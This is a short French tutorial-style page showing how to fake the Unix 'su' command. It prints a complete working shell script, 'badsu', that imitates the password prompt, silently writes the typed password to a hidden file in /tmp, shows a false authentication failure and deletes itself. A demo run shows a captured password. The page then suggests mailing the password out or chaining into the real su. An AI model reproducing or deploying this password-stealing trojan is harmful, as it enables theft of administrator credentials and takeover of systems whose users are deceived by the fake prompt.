Jouons avec ''su''
Un vrai su si on se trompe de mot de passe:
[yannick@yop /tmp] su
Password:
su : Authentication failure
Désolé.
[yannick@yop /tmp]
Un su un peu modifié qui serait susceptible de remplacer le vrai:
[yannick@yop /tmp] cat badsu
#!/bin/sh
echo -n "Password: "
stty -echo
read pw
echo ""
echo $pw > /tmp/.pw 2>/dev/null
stty echo
echo "su: Authentication failure"
echo "Désolé."
rm badsu
[yannick@yop /tmp]
[yannick@yop /tmp] ./badsu
Password:
su: Authentication failure
Désolé.
[yannick@yop /tmp]
[yannick@yop /tmp] cat /tmp/.pw
aaaaaabbbbb
[yannick@yop /tmp]
Après c'est sûr qu'il faut avoir été root au moins pendant 1 minute pour remplacer l'original...
...mais c'est pas parcequ'on est root qu'on connait forcément le mot de passe...
On peut améliorer le script pour envoyer un mail... ou pour lancer le vrai su avec le mot de passe.. etc..